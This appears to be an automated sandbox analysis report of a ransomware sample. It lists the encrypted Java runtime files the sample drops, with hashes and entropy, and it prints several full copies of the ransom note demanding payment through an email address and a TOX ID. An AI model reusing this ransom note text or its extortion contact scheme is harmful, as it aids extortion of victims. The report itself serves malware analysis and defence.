                                Preview:.\`_..........}~....u.%..Q..Mz.X..O8....N6&7ON....|Wlg...3.....6.j{q/.4o........G...I..gA........d=<.\R.9...<..e}..l..U..,P.(..n.=c._.8f.5.m...u.Y~ ..............u.I&....hN.@.0.^.~5.h....B'.B....].H..F%.&/.3..{..6J..1.m.D..C..uj.X.(-.P.....p.=."...'.P.0..|p.f...|m/V..W..c(O.h..E........f.pu....0o.pL7.....~..........:#.c.....k]......8..'+}.....!.5..H..(;.................b.QVA....Z......./.TN..Lr...;7sI....i.c.....YB`P.....L."A.............k.qc.O._...U{..e.=:Y...=..[....,.2.j...R..9b.<.`.._v^z....q._z....U,B....i..d.u....._.z"i#.9+~....cg.._~......w...P).=wR..k.P.$F....T....n.G..k..$]...J..*dK.q<....;........q..J.O.c..<&:...C...1.......\0o.{1.[.u....S..o:-..../..kG.s..}...p.t.)o.....s...*..k6..v?.yg.e[%1.....^%..BA*%...&.r.}/<..J2`..+....J+&.z..`h.jJ@.t.DsI.Cm+.j........V..JL..;...G......a...*&!.W&.....\.......:...j..[6<.w7.{.1.H.6.....~.,..n2z..k.Q.3..L...UAz/...|`..>b..Zis...`...r...."..... ..'.T....P..a7.vg...#.....{...BE/b..N7O.

                                C:\Program Files (x86)\Java\jre-1.8\bin\glib-lite.dll

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):567520
                                Entropy (8bit):7.227920723668874
                                Encrypted:false
                                SSDEEP:12288:guxkVWawfs0Qp8Juzl6GxZGwviVuedvfEnIjiHGZY4:gWkVuk0QpQuzl6MZIYed8siHGh
                                MD5:B0DC94C4ED5BC78995EECB3E1A78906C
                                SHA1:BBCDCEBA1FBE346672BD129024107E6829EE97B8
                                SHA-256:41AA3325E8332C933BB2941BE7D868BD666C353F846E3F29969344ECAB987C44
                                SHA-512:01BE4D23C976DDA3A18AEF0AC8B6482DE1C57087C1BDA8528D35C2C734FF2E3800729167B45625A7875CE9CEDA504FC51C6B3F0AB90E7511A42C52483A53BD1C
                                Malicious:false
                                Preview:j...W....C....d..\;{.x..4....'..=.'...#LPT{Ir.I..' ...5.Oe...I..W!..........,.z.p..$...K....m... '...l.\+...mtb.K#u...C.a..}k.R\u..]%n...D.....C]m.|..............5V).%......5..h0D......j......B.....}\c%..(..y............fZ....T...#...)........j.k>.....OWN&H`....D..+0.!...$EO.(.l.l=4..v...p.....d..........>!UM..<(^C.....N'..l....y...i.Q..?..c..?.JhE&d.W........t.t.........{.;..x.o.U.:.S.&>.f......].....$.;l.....8..B&..f...B....D~..Yxc...U....o.x....\...ow..qF...T.h..'...D..........V.b.P....2.%...Lq...bM..m}P..7.it..2H...2.RO4..[..P.F..C...]..7N..jU..Z.B....<6A....m.m../(?.....U^yw.......ur/.Z.g...$L..m.3..(.(..'.wG^4I...H..r.^6..s$:}..N ...!.0....k}t......[...Z.......Mn..v...1...eg60=.1...3.+"v~..j.jD..+?...GRD.*m....F&.c...h*.n%.......R.....!nhCS.....#...rN>ivo<v.[...r2..5"o..-....t...VO....M....T..6n...G...u.6....|>....I.8I........#D;.......:......i.. m..p@:4.....7..W......... .\...&'d..CI..hZ:.{....&.Yd.....,.....Hc....

                                C:\Program Files (x86)\Java\jre-1.8\bin\gstreamer-lite.dll

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):799456
                                Entropy (8bit):7.340721640492317
                                Encrypted:false
                                SSDEEP:12288:hmPXqcI0g4ZTmIb1W+V+uIGvXXpYUdRhu56+xbj8DjPL+7/rlVInor6e97oOXkGz:qS4oIb4SfHbH0b+ejrlLrFWh2Q4R
                                MD5:E27973C6ED8F58C532486483422363B7
                                SHA1:8F23C8E045D92D9E0C57AB077699EBBDB0C1AD96
                                SHA-256:D4F9AEA50E85204290C6CDD1400C40707781CF491B64EF883CABF0FFC9855DE6
                                SHA-512:FCA98EB50C2CD3FB8815AE5D2A2D26F84AFE24FA9B3D508338A13461D200F497772D55A9D356883D941016D1C134468C37798ADC6A3D30FC45F5B8234729A966
                                Malicious:false
                                Preview:!...^.pO.M....t)Js....^....Gv.9w..T..c....]......'.L*.g?.QY?..b....<..u@B..l ...(..Z..&&.xk.Cr.../..:..A..u[..P.V..be{.))QV.....]Z..+...k.......ho./.N.J'.....3..e..yH...d.....w{;.......$...Z|h*..P.m.S./.v.g..mf....Z...ea.N..{...acfx...9.FKw..#..wq...p^:....;pr..P._.rW....u:.Ev2.[n.:x&..J5^"r.d.#Y#.,...x..mXU.wk.}k.........nV..Uvl....,_..wgS!...m.Z.n...s.......9Le`.......QFR.3,....8n..T2.....B....i...f.."...].w..*...Y.z.6....C(<.........D. ..D/..n5...A...1h.(...72...J...~.m.-.......J....._|.0.....V......I.).vm...s+..V..H........r..3.{.m.8.......my=&Y.~H...g.....O..SO..3.{.q>..3..Y..L\.@p.K.n..4.-...N=7.F.1z.....~..3x.n.!K........M*.:.<.....[...C.X.9..0.........y.\.....Z.......m>5g.9..[....7......*Z9.g7U.R..j......g.Mt...1.'Dt...A..}sc//.WY.;Z.+.M.^..[B....>.K.g.)..h...@..._X.yB7.V...:._...b.K...Y....J).-.M[..L.G].O..!...........I..[...n..l..-.m=.f-.....'FL......j%..`..T...t....@.......'0.>..K...Y...k.G.ID....Q.%..4..=!.U...4qT.........

                                C:\Program Files (x86)\Java\jre-1.8\bin\hprof.dll

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):140000
                                Entropy (8bit):7.998696269920782
                                Encrypted:true
                                SSDEEP:3072:SoWDDUrfObRUAJvxeCz4Sx9Gpl/5XTaErOSObphuxRo:eDArOVNxe9S4XdmpkxRo
                                MD5:E2837BB33BA9ECB68329218693F681A4
                                SHA1:09BDDD4A37A499911D87CED56796B9BD4CE511E7
                                SHA-256:0E22B639B6FA3436B3BEB12469094C920F7DA3220161FC5825BD7F01C60DBBAC
                                SHA-512:1DBC132BE7EF6DD22E30A5C2758EC1230F585DECAA6008BC699909EB6AAB8C36F5190D0AF2CDE2F74153DE96ECAE4DEAB380F2B8CB6A20147E92A425C676864B
                                Malicious:true
                                Preview:!.h&&.J....}.l0.-^;...:!w..V.nzD......f..w8A..ZX.r-!...<,.4U..UF.S=...7P..Z;.n..@.\QP..o<...#....a..q n>.Q.v.".....xX.2$'.......22.,.U[?.RR.!I..@....42..4.T&..{.a........9...5..C.H.'.[..z.........._d^...dDk...,j.<.7.nU|1<..b..K..V.n......{..`b"9(_..VSxm..0..3.!&...nm..4.l.....UX(..9....{x[..G.....4..S~..d...T.:.....&....N.d.0....i.... ..P-.q..I*..T.6...:..2b.K...^.uE.S.....q.:KIk.%....D.:.{.M@H.A.3.lz..i..l......b....LbYj.,{0C.nX.s...d...{S...~....2tiu_......L.[.y...;dZ..L.R.....&.<.:=z.0..'....vb.?'.e...\]...I.M...EE.$.|.1J..[..R.U...)R9!t..h......~...<...3..g....Di:Y&f.....<._X2.......t[P.".....x..B.'%..7z.<...t.=.....6.5...@Uk./.._0cL.@.....HQ..X...Na...8{..:,..l..u...x..2.....[."IyY....Pq..?..0.b...\U2..x<|........{+.X|....1...P...hX...C6".F..$6.a.....j....g...6..V....-.C.6.....F%..%.~\ch..r.........I....H..UF..G(.qH.....SL...... .k.J......5.dKT...."=...[.B.n.Vs..\..3].....PM....d%I4.8....X...........]N.^..).r=X\.>...YG.k.. ..hN.C.v..$

                                C:\Program Files (x86)\Java\jre-1.8\bin\instrument.dll

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):176864
                                Entropy (8bit):7.999007606637684
                                Encrypted:true
                                SSDEEP:3072:5F5NcfJ3HMN+07f4iMbFysaWChjYhh2MH+8mEQzNfCddWnPj6zpNs4vs1kWt:MRMQ24iaaZhUhhFe5OinGzXsss1kWt
                                MD5:29C410F21DC6E44873C37C7DFE8F9D87
                                SHA1:716C856419113556136C3786E2BD6F6F2EA01786
                                SHA-256:3C9F0E28E97772A54A7CAED26AD8D45743F4AEA2C87B71E7A59D3C3E4CAB3F7B
                                SHA-512:E6667C704E9166ACABB04963C8E16922515FB6B298D508266FF592E909F9ACAECBFE1C8A6E57D55301F2958E67E1D7226A0CA69784A267C60B62CDEEBAA46D78
                                Malicious:true
                                Preview:.2U}.LJ=7.+.C.N...4....iV......y...M..{...e..x.....s.....h.\..T6......I.>~.<9..l.>.N.R...Uk.A].5...#!.D..H..:....v..H._A.7...&.h.=*....j.4">3.......[......s3...3...m....V;!....!...%/...P.].oz0.Wd=..?.'..EjF......"....H....._*8.@.Za..^.r.3..-..;..!<.Y7.O......=...L...i..8...+&09O..e....%.(..#K...q._ ....oz1..w...A5..ll[~+...O......~..?Z8...)p.q..(2..m.aD.*.J..s9l.6....k...@....2...H..........M:..?...s...:..u.....W[.i?.6..a&<U.#P.........+84.....?....&.E..[.N...".K0..&.;-.WM.S.m...].fv..Q...V............9....-hB....*S..`[YI.{.~Q.zRc..e..(.....#sp..a..].......rtNS.....8....z.a$.....Jp.Fv..R"r........V"..............%.p..m..>Zi/.O.E_..)'.q...Zf..`....2..[.|..+.O.V..H..s.C. .:..4;...........u........^=.+.o.o..M;5....0.....</=.....u&....Y.p.pp.OL.=....,.Q}u.".....|..z....Ed...U.*`.e1g_*.O.F.,L.7..^.AdR....R....6N..ri.4...3.Y....<<.#......g.(.JY..]....T..npA......c/.x.nM...t....d..........N7.5..F.N..S...t{....=.-..u..6..f..HB.Y..UTU

                                C:\Program Files (x86)\Java\jre-1.8\bin\j2gss.dll

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):44768
                                Entropy (8bit):7.995653488210379
                                Encrypted:true
                                SSDEEP:768:ZWSKLK4ZXF1llXqyfhAP4N2PVayHnqCOveCMREZlpeIBD9vewoxYI8PTXnoJjfTL:ZWdLZll6ChE3zCMREZnBxe9x18LodLhB
                                MD5:3E4840663FE8DC449685AD43198DB4D8
                                SHA1:CFEC49F8F56306981B4F48C3F6E133870C21A29A
                                SHA-256:373D4578117EA9C3AC96128CFC4E989447CB0E663125DA35425D9A90C7A4213C
                                SHA-512:85984AEB17D10D3E976C9DA8437FC59623109212C5BC32501B35ECFF8927B0CC87EE1324DD772CAAB2D2F5C8617800B97A96C7B38C867FFDE3434C14B9C1E061
                                Malicious:true
                                Preview:l&.n<i...-..l6%..N...NB..................I...7-....}.vNe.o...iN.Gf..F..z.#M ...aGM........k.<b4!6.../.....[...u.(...j..........4(..(.=...Bh....ix]T.>.....9.T..<..~R.T2.D2.2.,..h1...Q].N..;.X.x..f.m.....q0..j.....e...i;Z.....H...MrQ;....5.#.....X..i.Z.wrn[.l..c!x.7_.H7.!'...."R.-..(..6.J......=a....w..dV..V<..|f..Mv..f.=..'..M.=...((....1.$..u#.0HL...T2....p.J%:z...c.m..u. ......2.D.Wc:....i..tV{0/.L.b.(....`.6?.l..,..e..e.8,..-....Q0..I..p!.P<..8.T.FIC..../..SQ".3`@L.g5.Pv.=P..0.K.$...h}.._).M.. ..T...~....o".'r<....4..q..: .kj#(..=n......p.hi.Zt.....(."..V..H..}].F......g. I....;..aDF..wN.;.O...;.~..Ooh....R..Cw....).D...&P2&.1'7]..N.a....~...~....O#`.............'.>.f:1....*.@,...K?....E.5vX..6..y. ..M.66.........4..........i'pR...]..w...uyz.....I.'e.n.J&K..T.A;k?I@i.L.........Hw.8].....y..@.....+S8.?v>..>...P.P....M...T.O........N.o..|.T..5......#..g .^.K.9...P....2}.,._?...%..;...IlkY.)W...d.^....>}.C.....z,.w.~..i.......0..Z.c..

                                C:\Program Files (x86)\Java\jre-1.8\bin\j2pcsc.dll

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):23776
                                Entropy (8bit):7.9922148082497255
                                Encrypted:true
                                SSDEEP:384:WlkwQuzC+WkZpvp3RRZGpB8H3jfUOHUmeS0u9gsH7HoiVmcsHfgSursGxhsUr/yw:sewVWkdBO8UBmeA9pDViqsgn/yw
                                MD5:B6D234B2E7339689421F21270EBC54F9
                                SHA1:12C11EAF65A44E36274FE19118B8F3D19C035762
                                SHA-256:6D68E42CB06FEFF125131FB99401E6C1C5B13C04B2B28BD471DA831AFF97D079
                                SHA-512:B052F8F2C0E0CEFA1D0FC0B8719DC84E62FEEB63F49A25298EE87F21ACEBD5EDC4E92A45D099383209149214D60A9AADB50736FDD777DA536A76C5F401DB1085
                                Malicious:true
                                Preview:.H..x......'.5....ih.z.X`.'nV=cH..9....xM....s....z.pU....G. K$>..........?s>..F...P..j=g.).I..?T{.....K.....~.1JI..O.d.%.gW./..........LK..6.#..}..7E.sN.6..~..r.n...<..WP.B..H...@.E.s0zYk|+./.........c....Dp.....s....[#.>......8..4..#.PR.....$.U.F.-6.y&B.....C/.m.O...WM..j^`......6.i~.t.j..#A.vZ..kS8...F.1...Q....w~......k6......bsP(zJ'H^...$"VX..P.69..N3...O..Y.V.*....(..b.g..&.^.P.V.....vs..F...#.q.h.L...{...?&.F1y...b:..*....DSt..S..$.5|........L....[.C.f. ?.$"..={g....E........2...Z..[.,..N........rw..r..o..j.7..........YAXZ....%t.....EP..D..w.$.]../J..."....G}4QN........x\..8i..v..g.L....+.e..X[ZO.E..*O..7..%R...5.%...eR 8_..B......S51..U,Y..[..*..e.QiV*..."U.f}.......b....Bkw.$.$z.tM....Roc.|..Ys...J..2..~..^.\_..t.+R.O.|...Mlz.J...p1.Z+......pc.h..E......I...w.....@......x.R.b..~2P96..UjG...o.H...x.PE..d......h...n..........@..(BQ.=3.O.!..qe.'...<.:..te.H.j.....4FdY>.S(..;.]D.!.u3X...9uwd...{.....Lq.-..BvX..lA.I_W.I......g.F..z....u;h`.p..k.

                                C:\Program Files (x86)\Java\jre-1.8\bin\j2pkcs11.dll

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):61152
                                Entropy (8bit):7.996887697081187
                                Encrypted:true
                                SSDEEP:1536:p1nfREn1N3KE8qQ1/hi+Vj1qMFhmX1awWkwH2MyjGtLMyf2KVXb22F:XJEn1dK3hiEjcMjwaKpGtZfLVBF
                                MD5:821B20511CFB706F9119A745582B4FBA
                                SHA1:225EFB39427DC70C1659D4057AE02FC749E57240
                                SHA-256:840A7B020C696C2EB272387E05BC7A91F5876D285A07A333C52535E7A8664400
                                SHA-512:608E5459D94883F56FE3D976F5D02A35A9B8B241B07299C7DAC50F6AAAB2386FAD9D8418C64BFE376EE7D63048F413111504B816BFA4B1C3D95FC81E85679113
                                Malicious:true
                                Preview:..).)..$9....."..K.+..KbeR."*7.^r...,.Jh.1._.?5.:.p..~\..Vt[...;.Y.y..{.t..=......a.U.q.KY....[...[c4.q.....5..].aT.y.[{..:.y../......!.$..e.@......!.Xo..S......G...M...{......I..Rh..'bT.......8.sH.X+.d.0..4`....<..[....AIm.4..*....7.)y.....W"/d{Ds.....'.K.r.).....Kr2..P.l.SmC8^....g....e6.M.b,.J.H.51q{.....q.F........O...".X..z......7...o...E..%Q.......n.>....9 ....X..)..q[X.IV=.a..qEW.3w._...1...^E.:....\YF.6H.pE....{........K.Y...tO.....g..".U.aX;..)..m..%.>QN.jbN53`M9v~u}............U.B..A/....N...FHxiT.N....X..E}.....v.n.].f..+.?......C.j...X..Zb...K9......m.0{.&........4..g..-g..:K.I..PJ ..".Lg..;9...G.j0i..Ap.....Y.4...$L._.....Y.k..#8NJ......{...:s^.l...y.....J?j......X....:x.D....<...b.......x~{*..s.....#.5..=1p..j.........>sP........Bd.....C.....o.+X.T.....F.t... .wK...<WA..D....]YP..j..{..y._D..[.^..q."..}...\a.....;W>..5....*...Rg..........j]......F.$17.p.9!.a..3....5.e..\...._.?E...q..j.>'(.S-.r.....5R5..;.8.B0>.....".~

                                C:\Program Files (x86)\Java\jre-1.8\bin\jaas_nt.dll

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):26336
                                Entropy (8bit):7.992462693697551
                                Encrypted:true
                                SSDEEP:384:vzw6j6TQh1+bKqKPD3xZZmNxRGHezZrnE/ggrMVRpgGYJMamMFjA2zBn1eabh+Vm:bZj6kOmb3TEXRG8g/lrMLydFj1dn8OP
                                MD5:61E131A98518C842CF5CCB46F011987D
                                SHA1:17DC307278E4C34D6CE74B8D84144D411F08D2F7
                                SHA-256:FEE27652166F1621BE86E02EEC1EDD178D2878CF7C8080D9001CC4618B68FFB0
                                SHA-512:930421F79370D0F971C31684FA72604F01BFC6A2F15DF5B8A49B875E1235D587206E592FF89AFDD7FADAE9399CC60CC28F2492147F564BF86E8BC40E69420624
                                Malicious:true
                                Preview:c4.s.Z.S.D..O..|.w.......:..{..%.K..2...wqp.^w+.C..N...?rhz.....K.Z.a....p..........RE.........X..d./2..v.p...c..4.p.......65...N.&.......$+b....C.....y7....O.l.G.+g....},4.......&.. .0dY1I.YJ..\..".1.._\2O.*._&.Z......6v....g%.......n..dz%.S7...6e.....5...]..Yl..#?f9j...}....(u.+..3...,[.F...-.....W.Y ...Hi.....).'.(6....I.... w...B J.z.7.@wI...UQ...3k....A..c<n.(d.1y.o..]..i$...a....[/.|..F..HoH`...1.)....98....0.5...ue%.A..W...$tb.Ro4.....Z.dB/.nw....nU.........:4h.......E.!....Z...R...a...0..+......m.}.UC.`..D..Y.d.L.2..?...!.........X.B.@+0O7zm<f.P.XF..}.b.k.T..a....y...Y....C.Nv..=B..P..i.,...@........t.....k..!...\F..v..!-..Q.W......u...<........C<..,.rMs.A..!.f..Q.@)..}..%.|44....:..S...tD~.8.N.C.G....Y.....]"..9..Mm.o\.|u.Sc.e..?.#}k$....5v......N]..../..K....a.H.oJ.1.c..f..'...<..z.2Fg"a\].~.T....P.:BF.gC...5..w9vI .&^.......k.+iA....7....4.9D..o...*T......C\.Y.Z.On0...wr......o...8U5.__.MDu$/*Z.....]..c.d.

                                C:\Program Files (x86)\Java\jre-1.8\bin\plugin2\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Java\jre-1.8\bin\wsdetect.dll

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):192736
                                Entropy (8bit):7.9991235609400215
                                Encrypted:true
                                SSDEEP:3072:2+IMWx2NC/0EUUqQpsLC3quUOvMXCXxS5TuItfvyRon07NOr84MO5pSd7pEUHJsw:NqICzUIpscquU6xSFuItbKuMO5gdF5JF
                                MD5:F620692E971418D073313CE39A7C0456
                                SHA1:15AE28BE6E70B25DFC2B206C770A23C463813F21
                                SHA-256:6C024BD7D97651B2BC86F8BF30A3849677F3D1E09B9171E36079C207DBC9B581
                                SHA-512:B1B0D00B9DD40B3FE6EF8FA9A0B5DCD94E5AECC31ABEB5DE2716FE43DC95694FDFFAABDEE6CA2134D66577CE01337C8E9BC7D05C97ABE1539CBD79F0003EED77
                                Malicious:true
                                Preview:|..>.H..y...mP.6.....n<..h...5Q..+X..wU...{Z.;.7.......I....K.....C%.<u....`.w..a...v.......5[..........4..S.^........G......ROX.p....FY..d..z...=\.]W....4.[...B'"`Z..>;.....R..\~6 ..70.....*vX.iAq.O.oE...$.b}.v.;-....d|[..lv.....Kqv....e....n.....:."..CL!.."+.1.{4....J.K...,.R...&I|.F..!.t......w-.,.J..?j......R55..r.;...&rc.>......v.w.h..._........]XO..k&....W.aon........Lq.$..BF.=.`.2.'X....%.]|..K..c..cn...B..,...._..j...y{E..........F.......dO?..f.I..zL..p.&].%1)C...fYp.a8.~.e..C.B@.9._.....WXU-.&..W..t.bgC!_.R.{..;..C.y..e..u.f...o....(....&..%....T-..R.....v.....5..YA..|8...B...Q........%V.....U..f..Nh..)/.!......o'.LRxL.3sR....&"9.....8|=..#$.....3J.4W....."......V.....#.......*.J+H].EH..P..kD\.yL........V.........4=?.E..S...)7.~..Lg./).........& ..\.$b..*.sOn.@.<...k...4.|W..Jb8.."o_2I..N..:...G..Dg:.Rc4.rV T........_....Y..h.NLj..Mb...$."-......?..<A..N"/0...j.#.a.s.f. .-..i....x..f]8......g...7..t-../.....<I.1.....W-.J...\...

                                C:\Program Files (x86)\Java\jre-1.8\bin\zip.dll

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):82144
                                Entropy (8bit):7.997391316758768
                                Encrypted:true
                                SSDEEP:1536:iGS2PoB/QFGULWe54Z5OSK5tHorWKVu0FRyyJOc+3XSQ3Gy/ukT0IT:B5oB4gQX54ZYmWKkSRyuOcuHx
                                MD5:A6FC0E358F2690267B6692FADD330CB5
                                SHA1:88F0D41AF9914F48BD0A3A167CB56819385498B3
                                SHA-256:A398C30B6DE0951ACE6DB525DEA1F7BE70BDC8DB93BC02680D2EA8654ED6F8EF
                                SHA-512:5C19598C0FCDDAE3DC6598A03B262F862AE195AEFBE9A054EB88EF1C75833FAFD73D1C587555A5FE6D06376F91574F1CCBAD57A67069AC7DBEF02C9CD33B12B6
                                Malicious:true
                                Preview:uS..i\.h}-..]......%L.y..f...'.%..A].b..I..)0..'..x...(../........._#x..2]..4.1..M..3*(...V..@E......[.^G.......K<....Tbh..j>.........=(*&4p.F.LAcgW.T..f.....#...t..2..S...]...,...<2..4V...2t.S.i.22..$d.8[./6...@|...y.u.&..bJ....4.n......f.......;.e....k4S.~\.v:......#:..:.}j..\.:..F.l.P.}.@3<..K....U../cv....r..W..S.}..BA...5.._...[...x.mgs./V..%.TB..a.vV....?E}R..gKh..Z.0@.X.l...E.^...\.E..!+...l!2t...0.;M..%.1....*..E....voz...eD(..w.....HH.q.q..7y...ZH=...`X.P!...25h....Z\C....G.u..K...MM.X.[W..fw.3...k?....o.Y.......~4...M......R...6c..w..-v....=.&E...h..(.w\Gi.|.....\GJ;....$.*.w.$.e....hd.UX.....y.,rv._c.QC...[...A...g....$..I@\.....$]..xb...!...b..G\.~Ww.n...@.b.y....Cb.A..R..@.},a..Z!j..s....<........f9.B.(..\&qa...q.+2T..-..>...+..X.!P5Q..37.~.(.....f9.@..%..D....Z.8.tCg....<s.A.Ah.FQ.X?\.'(........$...K..uA.W.O..%.pnt1i.}v..F..M.z..d..)R.b.V........~Z........."..S.l..?W6@^1z..M......_...79U..S..B..uf+#..'.?...4Z."..v..6E..4m...g9?.

                                C:\Program Files (x86)\Java\jre-1.8\legal\javafx\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Java\jre-1.8\legal\jdk\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Java\jre-1.8\lib\accessibility.properties

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):757
                                Entropy (8bit):7.679358658025262
                                Encrypted:false
                                SSDEEP:12:AazVw3Li1vQqOLHD5XsYCWw14eNR1PcrSOGJ9fuyAWKj0hOJNuauDZMK5mg/2lWO:A+WuKjj5z/wpDyYPGTNj0hOHAVMJg6WO
                                MD5:CAC5A4971CCE9C105EED85A29EA39C34
                                SHA1:9B06873136DB07A8B926F2665471FA8C4D8CB66C
                                SHA-256:9B171B21D67172A3206BAEBC55AB8740140527A28F27EB4E7BF2CD091DFD3092
                                SHA-512:9F7F080C51E5C69167878E8D99EB0A9E9C7B0740305F94AC9CAF58D0A0A507CA6F58262DAF48AD7FF5E63420BF31977E473C9E819C98A0EC11BECA37C8F13F91
                                Malicious:false
                                Preview:.3.v....Q....@.5.{M..5|..M.7a.....;*.......d...Pp.@).E....'..VK".-..K+.....G..Q'.d....L.}U..*..g.....zz...E.."-.#...~....I{#..s..t!So..{8....}V.../...JKE.Kq}.P}.5....J-=j.....p.;o-..H.._V...[..8.#.e..4dW`.W.9D=.=&..A....^D.6...AF..\..8...%..AT.S]...}[Q..-.XC<..c.:U.....UQ..*R...A..,.M7A.!..i#...A~.....].*_.`.Q.?....F..m..}.....PT....<e.M.o#.....Z/.....eU.zf.'._..W[c6....L..........j..\h0....Cl^.....)........J....`"./.5..H....?.d.5.......# ......./.G...X.Z^...l....R...(...i......N.".y..@..;........&..a...^.*....1%n.Ub\P|.@.EI..Q.vZ....)q.kW<....2....|=^UlF.......YA.t....Y.!<../....(.>.*.U...pCW....7eEa._.....Bl^.EU..:I...._.&.P.`.I.h.d.2>Z..!...N....w...N..G....~u...H_Q.`U.e.}.IzM....................fk.W...f

                                C:\Program Files (x86)\Java\jre-1.8\lib\applet\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
